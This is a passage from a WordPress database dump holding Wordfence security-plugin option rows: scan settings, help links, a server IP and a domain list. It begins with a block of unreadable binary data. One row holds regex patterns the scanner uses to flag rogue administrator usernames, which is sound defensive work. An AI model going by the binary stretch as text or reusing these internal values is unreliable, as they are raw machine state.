\r�<ȉV���T��Q���T��S*;��tRZ�VZ����(mΚ+�N*�c�v�E�}U��(#N�l-P:Sݕ.�T����k�/���\r���\\選��rئ�B�P�l\\�<�$V�~}Ry��M�\'��<+��pWԅ*���`�z�9�t��ʋ\r�ʰ����AG�W[_(#��+�\no)�K�)of�S��(o�T*�\r��o�)K��+���5��t�)��y�2��2�1[��mV�emR�w�*ߤ(�����Z�)KW�(K�}ʚ�\'�5,o��ov�ڕ|e퇲NT>�ݩ|�{M��蠲!�W�H�R>�8�|~�G�\"gV���|�6U����������_����}T����O�nЭl��Wv�R�݉iʾȫʏeB�r���?��T�UYQ�\Z�#���#�p�-_�%��r\"���k��r2���D~UN�Ӕ�lu��W�k�)��)3��s�m���-.J\0����J �����WBn�)a�KJ8���U�ܥP\"[�(��J��q%�앒$\nP�m�*)&�Ԑ%�\\ɜ����u*��h���C)��O��X�r�!bq�\Z��x >��EC�+�r�Ji�4.��8\\CK\"B ����N�II�H���T$\r�%�P�T$Rtҥ�z�������ѠPz��n�ng@�(%虳z��C���Qe軣���@��(�����hP�-/��ˠy���g��Z��`�|W����A;��=]Л�z�,�~�_R\r��`�F�]�Q}r�p`<�=�۹`�c$L�5�i%\'a��50c�\'�N��yf`��1Xt����:eX��\0���]����y��m�-=v���`�k���0�e,P+G�����,}4\n����n�u\\���*�e�n1�_<��﯁��R�^�`����t�Y�|����d�;i�C�}��g�F}?�=6���&���q:l�U��D�6u��Nm�9��>����q�aot*x�B D\'B�o@H����*84J�L����p�D�g?9eD;�A�_eS}b�,�ؽ��\rq�VB��E�wU���8b$N2�$�H�Rgg���P#87k=��}.��Az�\\H_<2�l�Kw��2o��~\\��\nWՕ���pͰnV�@��T�;�����p�3�7�Id���c.�=}��\n��BQX)<�M�G\njP|�<<q_�����=�y���TCx�\'\Z�;~��I�b�p�\\�\0UGW��_�+\'x}��F�@�Q&����4j�B��h��_��@���p����2�M2|w���:[�O�w�s��|z�3��*`�v���֚aOY�J�\n�tB\r{�.�>Nި|�\ZU~t�/;��8`�\'���/�A���q!v�����Q{P#�7��W����hp���Ge����q��8Ƭ��tG�KG��J>�kU� /\"pb�\Z/Vt�)���$�M��I�6N���iW4p�h\r��Q4�[����,`�Q��9C��Wh~�Z\\�-���)Z^|��izh�2���F�2�*�C;�l�/:���p�K9.�\r��U�!��i�=tz:W�MD�wQ�\Z�=\\��G���8=ߏC�/�Kw5z�rB��V\\�7�L\n�5���?{�g��M�Cߜz�߃~���I�1@�?nL��@�+�9�n�x�[�bq�_w���p�5{��o�{����m^���4�4��_p?��3���x0�\Zr���6����%x8���ã�Nv���q�0�[������w�\n�}��#�y�&<��$�C����ɚ�0��?�`��=1c�[��/5�eW+̲�YS�zK=f�`Nb��o읆7�{���oM���?ǻ5���e��{���e%j,�B�Xd\\�����\n|��ş��I?G,�\\�eϻ㳄h|�� ��\r�\n�`��5+k�cո]�ҿ_V��X]�\rk<W`��I���o�b]��5��?N��3���������n`Ky~Vٌ��\r���FI�~d�w~H������3\0�t$�{ȓ�I�4�?��n.��}�r�\\E=�3Ii�g�5˔z��B}�:H9/�T��P��i@�Ѥ�M�Ҡq�i�r�\\[B�����5�\"i]J!��H{Y霉�a]7а�wIo� �=n&��d��L�!/Ȱv>�\r�L����%�4�0M*J�)�\'iʢd�^J&�$���hځ{4�|+M7/����d���溚���dn�L�H\r&d9͐��m�E�}S9�,%��6�G���B��B��E���F9�ϥ�%\Z�ts-M;L˜��yw�ts�U����\\Z�@Վ�eyŇ��eZg�N>�䛹�|�O%?�0�����5���;�6X��Pږ@���}ӂh��ڇ(��?��K�|������Xc:��M��\'P��5�����2:��H�3/PTk�\\ tj�d��+��7�(n�1JP$JPk��E����l�(���Bg����>��J-��Ԇ:?���b�)�Q�5�S�1o�{A]�J���<(kv\"]u�@�^�� �6L�v~���B9���F�Gʝ|�r���[]����2���74P���T��Dz��Å:���*���J�]���OR�g_*\r2��s*�\ZHe��P��-���F��s���=U;���2�u�I�Gһ���L ���?fPÔ�(-����o�Rs�~����h�Km��Kj_��ګ��Ou�U����s@�\\ً�ʆ��p���];-X!��rSYq��?��Φr�=V�g��U��.���yɪ]G��SVmV�uXm~\'�e��A}����<�љ���АJ�Yp�u�M`��<�ڄ�eO`����`�56���#V��a�<�x ����#\r�����<�[��l��̖�x�<a�:O��\'�ڰ��d�<Ý\'���)�3٤L���^�3�&�i~ώW`��M<��[&�b+�,��p���{���^0��ZG��;5��t/_W�˃?�\r�RmŮ�&�_�ͫ��N]e��yu�-�qِ=��c����&Bx�e(�����ղ��&{\'�?��bʾ���O�oP��f.�@-\\~����9�]�wm��ݣ����Q����q�8~��C��8tq9�ީ��O{pؚt˨�6|�s&�ٕ�g#G�_��8ҹ�#�� c\r>�Q��S?sL�O>�x�O�[ñ�9V��Oo�����+�p�ݕ���I����N����My����(�s���y��|q���h��}�����Ô�8��&_��f��k-����|{�N��ѓ��w}��|�|�..(�̅;�\"�ü(~ؖΏۺ���\"��pu.7I��E\\�Ѝ+^�s��a~i;�����n���#f��g\\�Ńk5�s��N~S�;��n��;��m������>r��Hn�|�C�p��}�4@�?���ֿ����%�Mώ�Y~����^�g3�b�گQ�P���6]Q>Q\'�]���jQ�}!�eWd���5!Q�䄋v��h�g��}O\Z8Wt\"~�XO�)�ݎ2줱��*��4���$�?�C�_���Ā��(�E����H�<8(c*Aƙd�Dj�IˣdJ��Lm6��ފ�5��V�Q�buJSlU��6Ķ���־�w�]�T���)�[�dA�HYx�U��8�*�%�ʲԌeiL�8���ӫ4Y5t���T#�;�WI������ɺ��) _+KY?{���W��4L��ٺ3M�(J��z�i�(;�%��X�\'�J�z�LҒ��v�И>rx���\rk��x+���.�W���Z9�D5����?�T�P��X- +NH�XV()k^KJ`����\'�c�%uF��S��i#$ӭH��I��sɪ�\"Y�%r���6\'A�\"$\'*Rr�%ש@�ɝ�R�?T$���R01J\n\'ΓBUy�V*u\n�q��<��E�wIqM���HI�gy:�J��<$�cʤ��@��I�~y���Tx{HŶ�RY U�w�e[����BjޚKM�Z�=~B���;���N�E�Mȓ�9(\r�{K�ۏ�О%�.��i��|2� -�����f�R�+��H�_i�>G�f͓�g�k{�|���ʷ�Q�1�]:��HG�\"�n��K��\ZS�� M�Ч$a���ͩ�fl�?�wZjȑ\0','no'),('manualScanType','onceDaily','yes'),('max404Crawlers','DISABLED','yes'),('max404Crawlers_action','throttle','yes'),('max404Humans','DISABLED','yes'),('max404Humans_action','throttle','yes'),('maxExecutionTime','0','yes'),('maxGlobalRequests','DISABLED','yes'),('maxGlobalRequests_action','throttle','yes'),('maxMem','256','yes'),('maxRequestsCrawlers','DISABLED','yes'),('maxRequestsCrawlers_action','throttle','yes'),('maxRequestsHumans','DISABLED','yes'),('maxRequestsHumans_action','throttle','yes'),('migration636_email_summary_excluded_directories','1','no'),('needsNewTour_blocking','1','yes'),('needsNewTour_dashboard','1','yes'),('needsNewTour_firewall','1','yes'),('needsNewTour_livetraffic','1','yes'),('needsNewTour_loginsecurity','1','yes'),('needsNewTour_scan','1','yes'),('needsUpgradeTour_blocking','0','yes'),('needsUpgradeTour_dashboard','0','yes'),('needsUpgradeTour_firewall','0','yes'),('needsUpgradeTour_livetraffic','0','yes'),('needsUpgradeTour_loginsecurity','0','yes'),('needsUpgradeTour_scan','0','yes'),('neverBlockBG','neverBlockVerified','yes'),('noc1ScanSchedule','a:2:{i:0;i:1631823600;i:1;i:1632082800;}','yes'),('notification_blogHighlights','1','yes'),('notification_productUpdates','1','yes'),('notification_promotions','1','yes'),('notification_scanStatus','1','yes'),('notification_securityAlerts','1','yes'),('notification_updatesNeeded','1','yes'),('onboardingAttempt1','','no'),('onboardingAttempt2','','no'),('onboardingAttempt3','','no'),('onboardingAttempt3Initial','0','yes'),('originalScheduledScanStart','1631564400','yes'),('other_blockBadPOST','0','yes'),('other_bypassLitespeedNoabort','0','yes'),('other_hideWPVersion','0','yes'),('other_pwStrengthOnUpdate','1','yes'),('other_scanComments','1','yes'),('other_scanOutside','0','yes'),('other_WFNet','1','yes'),('previousWflogsFileList','[\".htaccess\",\"config.php\",\"config-livewaf.php\",\"rules.php\",\"template.php\",\"config-synced.php\",\"GeoLite2-Country.mmdb\",\"ips.php\",\"attack-data.php\",\"config-transient.php\"]','yes'),('scanFileProcessing','','yes'),('scansEnabled_checkGSB','1','yes'),('scansEnabled_checkHowGetIPs','1','yes'),('scansEnabled_checkReadableConfig','1','yes'),('scansEnabled_comments','1','yes'),('scansEnabled_core','1','yes'),('scansEnabled_coreUnknown','1','yes'),('scansEnabled_diskSpace','1','yes'),('scansEnabled_fileContents','1','yes'),('scansEnabled_fileContentsGSB','1','yes'),('scansEnabled_geoipSupport','1','yes'),('scansEnabled_highSense','0','yes'),('scansEnabled_malware','1','yes'),('scansEnabled_oldVersions','1','yes'),('scansEnabled_options','1','yes'),('scansEnabled_passwds','1','yes'),('scansEnabled_plugins','0','yes'),('scansEnabled_posts','1','yes'),('scansEnabled_scanImages','0','yes'),('scansEnabled_suspectedFiles','1','yes'),('scansEnabled_suspiciousAdminUsers','1','yes'),('scansEnabled_suspiciousOptions','1','yes'),('scansEnabled_themes','0','yes'),('scansEnabled_wafStatus','1','yes'),('scansEnabled_wpscan_directoryListingEnabled','1','yes'),('scansEnabled_wpscan_fullPathDisclosure','1','yes'),('scanStageStatuses','a:11:{s:13:\"spamvertising\";a:4:{s:6:\"status\";s:7:\"premium\";s:7:\"started\";i:0;s:8:\"finished\";i:0;s:8:\"expected\";i:0;}s:4:\"spam\";a:4:{s:6:\"status\";s:7:\"premium\";s:7:\"started\";i:0;s:8:\"finished\";i:0;s:8:\"expected\";i:0;}s:9:\"blacklist\";a:4:{s:6:\"status\";s:7:\"premium\";s:7:\"started\";i:0;s:8:\"finished\";i:0;s:8:\"expected\";i:0;}s:6:\"server\";a:4:{s:6:\"status\";s:16:\"complete-success\";s:7:\"started\";i:5;s:8:\"finished\";i:5;s:8:\"expected\";i:5;}s:7:\"changes\";a:4:{s:6:\"status\";s:16:\"complete-warning\";s:7:\"started\";i:2;s:8:\"finished\";i:2;s:8:\"expected\";i:2;}s:6:\"public\";a:4:{s:6:\"status\";s:16:\"complete-success\";s:7:\"started\";i:2;s:8:\"finished\";i:2;s:8:\"expected\";i:2;}s:7:\"malware\";a:4:{s:6:\"status\";s:16:\"complete-success\";s:7:\"started\";i:2;s:8:\"finished\";i:2;s:8:\"expected\";i:2;}s:7:\"content\";a:4:{s:6:\"status\";s:16:\"complete-success\";s:7:\"started\";i:3;s:8:\"finished\";i:3;s:8:\"expected\";i:3;}s:8:\"password\";a:4:{s:6:\"status\";s:16:\"complete-success\";s:7:\"started\";i:1;s:8:\"finished\";i:1;s:8:\"expected\";i:1;}s:13:\"vulnerability\";a:4:{s:6:\"status\";s:16:\"complete-warning\";s:7:\"started\";i:1;s:8:\"finished\";i:1;s:8:\"expected\";i:1;}s:7:\"options\";a:4:{s:6:\"status\";s:16:\"complete-success\";s:7:\"started\";i:2;s:8:\"finished\";i:2;s:8:\"expected\";i:2;}}','no'),('scanTime','1631615574.297','yes'),('scanType','standard','yes'),('scan_exclude','','yes'),('scan_include_extra','','yes'),('scan_maxDuration','','yes'),('scan_maxIssues','1000','yes'),('schedMode','auto','yes'),('schedStartHour','4','yes'),('scheduledScansEnabled','1','yes'),('serverDNS','1631590910;300;51.77.116.174','yes'),('serverIP','1631305262;51.77.116.174','yes'),('showAdminBarMenu','1','yes'),('showWfCentralUI','1','yes'),('signatureUpdateTime','1631224477','yes'),('spamvertizeCheck','1','yes'),('ssl_verify','1','yes'),('startScansRemotely','0','yes'),('supportContent','{\"top\":[{\"title\":\"Blocking Troubleshooting\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/blocking\\/troubleshooting\\/\",\"order\":0},{\"title\":\"Optimizing The Firewall\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/firewall\\/optimizing-the-firewall\\/\",\"order\":1},{\"title\":\"Wordfence Web Application Firewall (WAF)\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/firewall\\/\",\"order\":2},{\"title\":\"Scan Troubleshooting\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/scan\\/troubleshooting\\/\",\"order\":3},{\"title\":\"Wordfence and LiteSpeed\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/advanced\\/system-requirements\\/litespeed\\/\",\"order\":4},{\"title\":\"Two-Factor Authentication\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/tools\\/two-factor-authentication\\/\",\"order\":5},{\"title\":\"Firewall Learning Mode\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/firewall\\/learning-mode\\/\",\"order\":6},{\"title\":\"Scan Results\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/scan\\/scan-results\\/\",\"order\":7},{\"title\":\"I am locked out of my site\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/blocking\\/#i-am-locked-out-of-my-site\",\"order\":8},{\"title\":\"PHP Fatal error: Failed opening required wordfence-waf.php\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/firewall\\/#php-fatal-error-failed-opening-required-wordfence-waf-php\",\"order\":9}],\"all\":[{\"title\":\"Wordfence Central\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/central\\/\",\"excerpt\":\"Wordfence Central provides a powerful and efficient way to manage the security of many WordPress sites via a single interface.\",\"children\":[{\"title\":\"Connecting your sites to Wordfence Central\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/central\\/connect\\/\",\"order\":0},{\"title\":\"Setting up two-factor authentication\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/central\\/2fa\\/\",\"order\":1},{\"title\":\"Using the Dashboard page\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/central\\/central\\/\",\"order\":2},{\"title\":\"Using the Configuration page\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/central\\/configuration\\/\",\"order\":3},{\"title\":\"Using Wordfence plugin options Templates\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/central\\/templates\\/\",\"order\":4},{\"title\":\"Using the Settings page\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/central\\/settings\\/\",\"order\":5},{\"title\":\"Using Wordfence Central Teams\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/central\\/teams\\/\",\"order\":6},{\"title\":\"Viewing scan Findings\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/central\\/findings\\/\",\"order\":7}],\"order\":0},{\"title\":\"Dashboard\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/dashboard\\/\",\"excerpt\":\"The Wordfence Dashboard provides insight into the current state of your site’s security.\",\"children\":[{\"title\":\"Options\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/dashboard\\/options\\/\",\"order\":0},{\"title\":\"Alerts\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/dashboard\\/alerts\\/\",\"order\":1}],\"order\":1},{\"title\":\"Firewall\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/firewall\\/\",\"excerpt\":\"The Wordfence Web Application Firewall is a PHP based, application level firewall that filters out malicious requests to your site. \",\"children\":[{\"title\":\"Optimizing\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/firewall\\/optimizing-the-firewall\\/\",\"order\":0},{\"title\":\"Learning Mode\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/firewall\\/learning-mode\\/\",\"order\":1},{\"title\":\"Statistics\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/firewall\\/statistics\\/\",\"order\":2},{\"title\":\"Options\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/firewall\\/options\\/\",\"order\":3},{\"title\":\"MySQLi storage engine\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/firewall\\/mysqli-storage-engine\\/\",\"order\":4},{\"title\":\"Brute Force Protection\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/firewall\\/brute-force\\/\",\"order\":5},{\"title\":\"Rate Limiting\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/firewall\\/rate-limiting\\/\",\"order\":6},{\"title\":\"Troubleshooting\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/firewall\\/troubleshooting\\/\",\"order\":7}],\"order\":2},{\"title\":\"Blocking\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/blocking\\/\",\"excerpt\":\"Aside from the Firewall rules that protect against SQL-injection, XSS and more, Wordfence also has custom features for additional blocking. \",\"children\":[{\"title\":\"Country Blocking\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/blocking\\/country-blocking\\/\",\"order\":0},{\"title\":\"Blocking Troubleshooting\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/blocking\\/troubleshooting\\/\",\"order\":1}],\"order\":3},{\"title\":\"Scan\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/scan\\/\",\"excerpt\":\"A Wordfence scan examines all files on your WordPress website looking for malicious code, backdoors, shells that hackers have installed, known malicious URLs and known patterns of infections.\",\"children\":[{\"title\":\"Options\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/scan\\/options\\/\",\"order\":0},{\"title\":\"Results\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/scan\\/scan-results\\/\",\"order\":1},{\"title\":\"Scheduling\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/scan\\/scheduling\\/\",\"order\":2},{\"title\":\"Troubleshooting\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/scan\\/troubleshooting\\/\",\"order\":3}],\"order\":4},{\"title\":\"Tools\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/tools\\/\",\"excerpt\":\"Wordfence Tools include Two Factor Authentication, Whois Lookup, Password Audit, Live Traffic and Diagnostics.\",\"children\":[{\"title\":\"Import\\/Export\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/tools\\/import-export\\/\",\"order\":0},{\"title\":\"Password Auditing\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/tools\\/password-auditing\\/\",\"order\":1},{\"title\":\"Whois Lookup\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/tools\\/whois-lookup\\/\",\"order\":2},{\"title\":\"Diagnostics\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/tools\\/diagnostics\\/\",\"order\":3},{\"title\":\"Live Traffic\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/tools\\/live-traffic\\/\",\"order\":4},{\"title\":\"Two-Factor Authentication\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/tools\\/two-factor-authentication\\/\",\"order\":5},{\"title\":\"Legacy Two-Factor Authentication\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/tools\\/legacy-two-factor-authentication\\/\",\"order\":6}],\"order\":5},{\"title\":\"Login Security\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/login-security\\/\",\"excerpt\":\"The Login Security page currently contains settings for two-factor authentication (2FA) and reCAPTCHA. In a future Wordfence version, existing login-related features will also move to the same page.\",\"order\":6},{\"title\":\"Advanced\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/advanced\\/\",\"excerpt\":\"If you want to know more about the technical details of Wordfence, you\'ll find the answers in this section.\",\"children\":[{\"title\":\"System requirements\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/advanced\\/system-requirements\\/\",\"order\":0},{\"title\":\"Changelog\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/advanced\\/changelog\\/\",\"order\":1},{\"title\":\"Remove or Reset\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/advanced\\/remove-or-reset\\/\",\"order\":2},{\"title\":\"Technical Details\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/advanced\\/technical-details\\/\",\"order\":3},{\"title\":\"Constants\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/advanced\\/constants\\/\",\"order\":4},{\"title\":\"Wordfence API\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/advanced\\/wordfence-api\\/\",\"order\":5},{\"title\":\"Troubleshooting\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/advanced\\/troubleshooting\\/\",\"order\":6},{\"title\":\"Plugin \\/ Theme Conflicts\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/advanced\\/plugin-theme-conflicts\\/\",\"order\":7}],\"order\":7},{\"title\":\"Wordfence Premium\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/premium\\/\",\"excerpt\":\"Wordfence Premium comes with an IP Blocklist, Real Time Protection and much more.\",\"children\":[{\"title\":\"Account\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/premium\\/account\\/\",\"order\":0},{\"title\":\"Pricing\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/premium\\/pricing\\/\",\"order\":1},{\"title\":\"License Key\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/premium\\/api-key\\/\",\"order\":2}],\"order\":8},{\"title\":\"Wordfence and GDPR - General Data Protection Regulation\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/general-data-protection-regulation\\/\",\"excerpt\":\"Defiant, the company behind Wordfence, has updated its terms of use, privacy policies and software, as well as made available a data processing agreement to meet GDPR compliance. Customers must review and agree to updated terms in order to continue using our products and services. We also provide a data processing agreement if you qualify as a data controller under the GDPR.\",\"children\":[{\"title\":\"Sub-Processors List\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/general-data-protection-regulation\\/sub-processors-list\\/\",\"order\":0}],\"order\":9},{\"title\":\"Site Cleaning and Security Audits\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/security-services\\/\",\"excerpt\":\"Let one of our Security Analysts help you clean your infected site or inspect it for vulnerabilities.\",\"order\":10},{\"title\":\"Login Security Plugin\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/login-security-plugin\\/\",\"excerpt\":\"The Wordfence Login Security plugin contains a subset of the features found in the full Wordfence plugin: Two-factor Authentication, XML-RPC Protection and Login Page CAPTCHA. It is ideal for sites that need login security functionality but either can’t or don’t want to run the full Wordfence plugin.\",\"order\":11}]}','yes'),('supportHash','861fa35ee92ea792bee38ef73e0d7326fc59d39ea2f0acfe3a0b998811dfbf3c','yes'),('suspiciousAdminUsernames','a:2:{i:0;s:46:\"/^wp\\.service\\.controller(?:\\.[a-zA-Z0-9]+)$/i\";i:1;s:55:\"/^(?:wordpressssadmin|wordprestadmin|jaime.besser56)$/i\";}','yes'),('timeoffset_wf','-1','yes'),('timeoffset_wf_updated','1631615566','yes'),('tldlist','|com|org|net|edu|aaa|abb|abc|aco|ads|aeg|afl|aig|anz|aol|app|art|aws|axa|bar|bbc|bbt|bcg|bcn|bet|bid|bio|biz|bms|bmw|bom|boo|bot|box|buy|bzh|cab|cal|cam|car|cat|cba|cbn|cbs|ceo|cfa|cfd|cpa|crs|csc|dad|day|dds|dev|dhl|diy|dnp|dog|dot|dtv|dvr|eat|eco|esq|eus|fan|fit|fly|foo|fox|frl|ftr|fun|fyi|gal|gap|gay|gdn|gea|gle|gmo|gmx|goo|gop|got|gov|hbo|hiv|hkt|hot|how|ibm|ice|icu|ifm|inc|ing|ink|int|ist|itv|jcb|jio|jll|jmp|jnj|jot|joy|kfh|kia|kim|kpn|krd|lat|law|lds|llc|llp|lol|lpl|ltd|man|map|mba|med|men|mil|mit|mlb|mls|mma|moe|moi|mom|mov|msd|mtn|mtr|nab|nba|nec|new|nfl|ngo|nhk|now|nra|nrw|ntt|nyc|obi|off|one|ong|onl|ooo|ott|ovh|pay|pet|phd|pid|pin|pnc|pro|pru|pub|pwc|qvc|red|ren|ril|rio|rip|run|rwe|sap|sas|sbi|sbs|sca|scb|ses|sew|sex|sfr|ski|sky|soy|spa|srl|stc|tab|tax|tci|tdk|tel|thd|tjx|top|trv|tui|tvs|ubs|uno|uol|ups|vet|vig|vin|vip|wed|win|wme|wow|wtc|wtf|xin|xxx|xyz|you|yun|zip|ac|ad|ae|af|ag|ai|al|am|ao|aq|ar|as|at|au|aw|ax|az|ba|bb|bd|be|bf|bg|bh|bi|bj|bm|bn|bo|br|bs|bt|bv|bw|by|bz|ca|cc|cd|cf|cg|ch|ci|ck|cl|cm|cn|co|cr|cu|cv|cw|cx|cy|cz|de|dj|dk|dm|do|dz|ec|ee|eg|er|es|et|eu|fi|fj|fk|fm|fo|fr|ga|gb|gd|ge|gf|gg|gh|gi|gl|gm|gn|gp|gq|gr|gs|gt|gu|gw|gy|hk|hm|hn|hr|ht|hu|id|ie|il|im|in|io|iq|ir|is|it|je|jm|jo|jp|ke|kg|kh|ki|km|kn|kp|kr|kw|ky|kz|la|lb|lc|li|lk|lr|ls|lt|lu|lv|ly|ma|mc|md|me|mg|mh|mk|ml|mm|mn|mo|mp|mq|mr|ms|mt|mu|mv|mw|mx|my|mz|na|nc|ne|nf|ng|ni|nl|no|np|nr|nu|nz|om|pa|pe|pf|pg|ph|pk|pl|pm|pn|pr|ps|pt|pw|py|qa|re|ro|rs|ru|rw|sa|sb|sc|sd|se|sg|sh|si|sj|sk|sl|sm|sn|so|sr|ss|st|su|sv|sx|sy|sz|tc|td|tf|tg|th|tj|tk|tl|tm|tn|to|tr|tt|tv|tw|tz|ua|ug|uk|us|uy|uz|va|vc|ve|vg|vi|vn|vu|wf|ws|ye|yt|za|zm|zw|aarp|able|adac|aero|akdn|ally|amex|arab|arpa|alstom|army|arte|asda|asia|audi|auto|baby|band|bank|bbva|beer|best|bike|bing|blog|blue|bofa|bond|aetna|book|buzz|cafe|call|camp|cars|casa|case|cash|actor|care|adult|cbre|cern|chat|citi|city|club|cool|cymru|alsace|cyou|cards|coop|data|date|dclk|link|live|loan|loft|mini|mint|amfam|chase|cisco|mobi|apple|limo|amica|like|archi|cheap|citic|click|life|codes|crown|deal|dell|game|lidl|love|cloud|coach|ltda|luxe|maif|meme|media|meet|menu|miami|moda|news|next|lotte|lotto|moto|name|navy|boats|nexus|alfaromeo|nico|nike|open|nikon|ninja|page|deals|nokia|ollo|alibaba|pars|bosch|airbus|nowtv|pccw|pink|play|plus|beats|bible|bingo|delta|airtel|baidu|black|lilly|linde|movie|ping|lipsy|money|pics|lixil|loans|locus|pohl|alipay|prod|prof|qpon|raid|read|dabur|dance|pizza|porn|post|phone|photo|place|poker|praxi|press|prime|promo|shia|audio|autos|azure|build|osaka|paris|parts|party|quest|radio|allstate|omega|allfinanz|canon|mango|vana|shoes|shop|show|silk|sina|site|skin|sncf|sohu|song|sony|skype|sling|smart|smile|solar|space|spot|star|sport|stada|store|study|style|surf|talk|sucks|swiss|tatar|taxi|team|teva|tiaa|tips|tires|tirol|tmall|today|tokyo|tools|abarth|abbott|tech|toray|video|abbvie|agency|total|tours|town|toys|trade|vegas|africa|trust|tube|tunes|tushu|ubank|amazon|duck|audible|avianca|brother|dvag|broker|academy|camera|coffee|auspost|channel|dish|author|clinic|docs|earth|anquan|aramco|career|casino|center|chanel|email|boston|edeka|chrome|church|circle|claims|banamex|abudhabi|auction|bananarepublic|comsec|bugatti|accountants|condos|fage|careers|desi|caravan|diet|capital|erni|coupon|dubai|epson|cruise|dunlop|dupont|durban|emerck|expert|accenture|associates|estate|events|attorney|credit|athleta|energy|accountant|dentist|fail|fans|fiat|beauty|fast|fish|florist|food|ferrero|fire|flir|dental|farm|fido|film|ford|frogans|fujitsu|ggee|final|finance|free|fund|gbiz|gent|gift|bayern|bentley|flowers|gmbh|ferrari|gallery|gallo|games|goog|bestbuy|guge|bharti|faith|gold|golf|guru|hair|gifts|futbol|haus|berlin|family|farmers|fashion|hdfc|fedex|design|help|here|hgtv|gives|horse|barclays|forex|green|gripe|barclaycard|gmail|barcelona|gucci|flickr|flights|globo|group|guide|host|honda|hsbc|bostik|drive|glade|glass|homes|hyatt|icbc|forum|booking|immo|yoga|house|ieee|ikano|imdb|lgbt|work|abogado|works|world|doctor|xerox|basketball|zara|zero|bauhaus|dating|datsun|dealer|degree|yahoo|direct|fishing|xbox|fitness|bargains|baseball|education|zone|barefoot|forsale|gallup|kiwi|contact|kddi|land|visa|koeln|google|jprs|kaufen|kinder|kindle|kosher|kpmg|kred|lego|luxury|madrid|maison|makeup|market|mattel|monash|stream|studio|supply|suzuki|swatch|sydney|taipei|grocery|unicom|android|tattoo|compare|target|company|taobao|viva|vivo|gratis|lexus|volvo|garden|global|legal|voto|lease|vote|george|giving|kyoto|corsica|juegos|lamer|lefrak|london|vodka|shouji|coupons|viajes|viking|villas|vision|voting|voyage|country|courses|lancia|latino|lawyer|living|locker|mobile|soccer|social|tennis|virgin|wine|zappos|agakhan|charity|college|cologne|comcast|airforce|chintai|citadel|clubmed|cooking|cruises|digital|domains|exposed|express|genting|godaddy|americanexpress|americanfamily|cricket|guitars|hermes|itau|hiphop|hitachi|irish|watch|weber|hockey|holiday|hotels|hughes|info|jaguar|java|nissan|nissay|oracle|pfizer|photos|physio|pictet|webcam|weibo|hamburg|hosting|afamilycompany|intuit|wiki|health|wien|imamat|insure|mormon|weir|hangout|norton|nowruz|office|olayan|online|orange|otsuka|toyota|travel|hoteles|jeep|jetzt|monster|amsterdam|juniper|lanxess|lasalle|latrobe|analytics|hyundai|jobs|leclerc|limited|lincoln|apartments|joburg|moscow|wales|museum|racing|tienda|xihuan|yandex|hotmail|ismaili|aquarelle|quebec|wang|nagoya|jewelry|natura|kitchen|mutual|m